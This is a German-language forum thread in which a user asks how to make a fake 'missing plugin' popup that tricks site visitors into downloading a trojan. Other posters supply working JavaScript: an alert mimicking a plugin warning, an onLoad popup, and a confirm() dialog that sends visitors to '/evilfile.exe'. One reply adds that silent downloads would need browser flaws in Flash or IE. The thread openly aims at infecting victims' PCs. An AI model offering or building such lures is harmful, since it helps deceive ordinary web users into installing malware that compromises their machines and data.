Plugin Download über HTML

[inmate]

Moin , also ich mach mir grade ne kleine Seite und wollte fragen ob es möglich ist nen Fake Plugin zu machen , also das die Besucher die auf die Seite gehen nen Popup Fenster zu Gesicht bekommen wo dann gesagt wird das ein Plugin fehlt.
Dieses Plugin soll dann ein Trojaner sein.
Wäre das machbar ?
Wenn ja wie ?
^^


mfG

[Zylasty]

Sowas wäre cool
Du kannst aber doch einfach per java-Script n neues Fenster öffnen lassen, z.B. wo n Stopschild (hihi) ist und da steht, dass die neuste Version von what ever zum richtigen Darstellen der Seite gebraucht wird. Und dann einfach:

"Klicke hier zum runterladen"

Hätte den selben Effekt.
Oder kannst es natürlich auch über Flash machen... Deiner Phantasie sind keine Grenzen gesetzt

[Clode]

Jetzt wissen alle, dass Sie wohl besser nicht auf deine Seiten gehen werden..

Back-to-topic:
Es muss ja nicht unbedingt ein PopUp sein.. Muss ja nur so aussehen.
Wenn du bissel geschickt bist bekommst das ja auch mit HTML hin,
oder gar mit javascript ein "Alert" vortäuschen.

Beispiel für Javascript in HTML

Code:

<script language="javascript" type="text/javascript">
<!-- // JavaScript-Bereich für ältere  Browser auskommentieren
        alert ('Ihnen fehlt folgendes plugin, um fortfahren zu können:\n' +
        'UltraLOLpwnTROJANER!!!11elf!');
// -->
</script>

Kannst mal

Code:

javascript:alert ('Ihnen fehlt folgendes plugin, um fortfahren zu können:\n' + 'UltraLOLpwnTROJANER!!!11elf!')

in Browser eingeben.. Dann haste das Ergebnis.

MfG Clode

EDIT: Misst da war einer schneller

[inmate]

Cool danke erstmal.
Sowas habe ich gesucht.
Doch leider habe ich von java ka.^^
Daher bitte ich dich nochmal um Hilfe ^^.
Also wenn er auf OK klickt soll nen download fenstern aufgehen wo er eine Datei von meinem FTP runnerläd.
Also wenn er auf OK klickt soll ein Link aufgerufen werden.

danke schonmal

mfG

[Cyberhunter]

An besten wäre es wenn es sich im hintergrund runterlädt.
Wär doch soweit ich weiß auch möglich oder?

[inmate]

Wow wenn das einer könnte wäre es natürlich noch geiler ^^.
Ja stimmt möglich wäre es.
mfG

[VeN0m]

Per HTML geht das natürlich nicht. HTML ist nur zum darstellen geeignet und hat keine Funktionen etc. Was Du suchst geht per JavaScript.

Aber warum kein Popup? Danach hatte inmate ja gefragt:

HTML-Code:

<html>
<head>
</head>
<body onLoad="window.open('/evilscript.php', 'Plugin',  'width=500, height=500, status=no, scrollbars=no, resizable=no');">
Inhalt der HTML-Seite
</body>
</html>

Öffnet evilscript.html in einem externen Fenster mit 500*500 Pixeln Größe.

Zu inmates vorletzten Post:

Code:

<script language="JavaScript" type="text/javascript">
<!--

var agree=confirm("Es fehlt ein Plugin auf Ihrem Rechner, welches zur Ausführung dieser Webseite benötigt wird. Installieren?");

if(agree) {

	window.location.href="/evilfile.exe";
	
} else {

	window.location.href="about:blank";
	
}

//-->
</script>

Es öffnet sich ein Alarmfenster, bei welchem der User mit "ok" bestätigen soll, dass er das Plugin installieren möchte. Wenn "ok" geklickt wird, wird der User auf die Datei (evilfile.exe) weitergeleitet, welche dann durch einen Downloaddialog heruntergeladen werden soll.

Das Script kannst Du auch in eine Funktion packen, die Du z.B. "checkplugin()" nennst. Dieses wird im Body ausgeführt:

HTML-Code:

<body onLoad="checkplugin()">

Bei "abbrechen" landet er auf einer weißen Seite (about:blank).

EDIT: Für einen Download im Hintergrund bräuchtest Du erstmal eine Sicherheitslücke im Browser. Da finde ich die Variante mit dem Virus per freiwilligen Download schon besser, da nicht jeder eine alte Version eines Browsers hat.

[inmate]

So ist es perfekt

Danke

Gibt es eigentlich jetzt noch ne Möglichkeit dieses "Plugin" auf dem Vic PC zu starten ? ^^

mfG

[VeN0m]

Wenn Du eine Lücke auf dem Vic-PC findest, die das Ausführen der Anwendung erlaubt, dann ja. Gibt ja Lücken im Flashplayer, IE etc. Einfach mal ein Wenig umhören. Ist jedoch nicht so mein Themengebiet.
Man kann jedoch davon ausgehen, dass jemand, der ein "Plugin" downloadet dieses auch ausführt .

[inmate]

Ja stimmt auch wieder

Na dann ist ja alles geklärt


mfG

closed